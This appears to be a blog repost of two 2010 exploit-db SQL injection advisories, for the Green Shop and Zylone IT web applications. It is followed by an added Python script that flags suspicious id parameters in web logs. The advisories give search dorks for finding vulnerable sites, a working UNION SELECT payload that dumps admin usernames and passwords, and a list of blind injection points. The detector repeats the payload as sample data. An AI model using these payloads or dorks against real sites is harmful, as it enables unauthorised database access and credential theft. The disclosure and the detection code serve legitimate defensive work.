
SQL Injection Vulnerability

by 날으는물고기 2010. 7. 8.

SQL Injection Vulnerabilities Green Shop
  
[x] Type: SQL Injection Vulnerabilities
[x] Vendor: egreen.ir
[x] Script Name: Green Shop
[x] author: Ashiyane Digital Security Team
[x] Thanks To N4H
[?] Submit By PrinceofHacking ^_^
[x] Mail : Prince[dot]H4ck@gmail[dot]com
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 
D0rk: "egreen.ir"
 
Exploit:
http://site.org/index.php?pid=[SQLi]
 
Ex:
http://site.org/index.php?pid=77/**/Union/**/SELECT/**/Group_concat(username,0x3a,password),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17/**/from/**/admins/**/--
 
Login Page :
http://site.org/admin/login.php
 
Special Tnx : All Ashiyane Members


Zylone IT Multiple Blind SQL Injection Vulnerability

# Exploit Title: Zylone IT Multiple Blind SQL Injection Vulnerability
# Date: 2010-07-08
# Author: Callo
# Software Link: http://www.zylone.com/
# Version: Unknown
# Tested on: php
  
10101010101010101010101010101010101010101010101010101010101010101010101010101010
0                                                                              1
1 ~# Title: Zylone IT Multiple Blind SQL Injection Vulnerability               0
0                                                                              1
10101010101010101010101010101010101010101010101010101010101010101010101010101010
0                                                                              1
1 ~# Date: 2010-07-07                                                          0
0                                                                              1
10101010101010101010101010101010101010101010101010101010101010101010101010101010
0                                                                              1
1 ~# Author: Callo                                                             0
0 ~# Home: www.gsk2.org                                                        1
1                                                                              0
01010101010101010101010101010101010101010101010101010101010101010101010101010101
1                                                                              0
0 ~# Software Link: http://www.zylone.com/                                     1
1 ~# Version: Unknown                                                          0
0 ~# Tested on: php                                                            1
1 ~# Dork: Powered by Zylone IT                                                0
0          Powered By: Zylone IT                                               1
1                                                                              0
01010101010101010101010101010101010101010101010101010101010101010101010101010101
1                                                                              0
0 ~# Exploit: http://localhost/[PATH]/news_details.php?news_id=[BLIND SQLi]    1
1             http://localhost/[PATH]/news.php?cat_id=[BLIND SQLi]             0
0             http://localhost/[PATH]/news_details.php?sec_id=[BLIND SQLi]     1
1             http://localhost/[PATH]/home.php?page_id=[BLIND SQLi]            0
0             http://localhost/[PATH]/events.php?cat_id=[BLIND SQLi]           1
1             http://localhost/[PATH]/policy.php?sec_id=[BLIND SQLi]           0
0                                                                              1
01010101010101010101010101010101010101010101010101010101010101010101010101010101
1                                                                              0
0 ~# Greetz: Whivack                                                           1
1                                                                              0
01010101010101010101010101010101010101010101010101010101010101010101010101010101


Source: exploit-db.com
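
Added example (not part of the original advisories or of exploit-db): every parameter the two advisories list (pid, news_id, cat_id, sec_id, page_id) is a numeric id, so a defender can flag any logged request in which one of them is not a plain integer, which also covers blind variants without enumerating payloads. The log lines are constructed (combined log format, documentation IP ranges), and the function names are hypothetical.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Parameters named in the two advisories above; each is a numeric id.
ID_PARAMS = {"pid", "news_id", "cat_id", "sec_id", "page_id"}
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
INLINE_COMMENT = re.compile(r"/\*.*?\*/", re.S)
# Keywords taken from the Green Shop advisory's own example request.
SQL_KEYWORDS = re.compile(r"\b(union|select|from|group_concat)\b", re.I)

def classify(value):
    """Return None for a plain integer id, otherwise a reason string."""
    if re.fullmatch(r"\d{1,10}", value):
        return None
    # /**/ stands in for whitespace in the advisory example; collapse it first.
    normalized = INLINE_COMMENT.sub(" ", value)
    return "sql-keywords" if SQL_KEYWORDS.search(normalized) else "non-numeric"

def scan(log_lines):
    """Return (path, parameter, reason) for each suspicious id parameter."""
    findings = []
    for line in log_lines:
        match = REQUEST.search(line)
        if not match:
            continue
        url = urlsplit(match.group(1))
        # parse_qsl percent-decodes, so encoded values are checked in clear form.
        for name, value in parse_qsl(url.query, keep_blank_values=True):
            if name in ID_PARAMS and (reason := classify(value)):
                findings.append((url.path, name, reason))
    return findings

# Constructed sample log; the second request is a shortened form of the
# advisory's example, the third is a non-numeric value with no SQL keywords.
SAMPLE_LOG = [
    '198.51.100.7 - - [08/Jul/2010:10:00:01 +0900] "GET /index.php?pid=77 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [08/Jul/2010:10:00:05 +0900] "GET /index.php?pid=77/**/Union'
    '/**/SELECT/**/Group_concat(username,0x3a,password),2,3/**/from/**/admins/**/--'
    ' HTTP/1.1" 200 5300',
    '203.0.113.9 - - [08/Jul/2010:10:02:11 +0900] "GET /news.php?cat_id=12x HTTP/1.1" 200 900',
    '203.0.113.9 - - [08/Jul/2010:10:02:15 +0900] "GET /home.php?page_id=3&lang=en HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

The same allow-list idea is the fix on the application side: cast these parameters to integers, or bind them in prepared statements, before they reach the query.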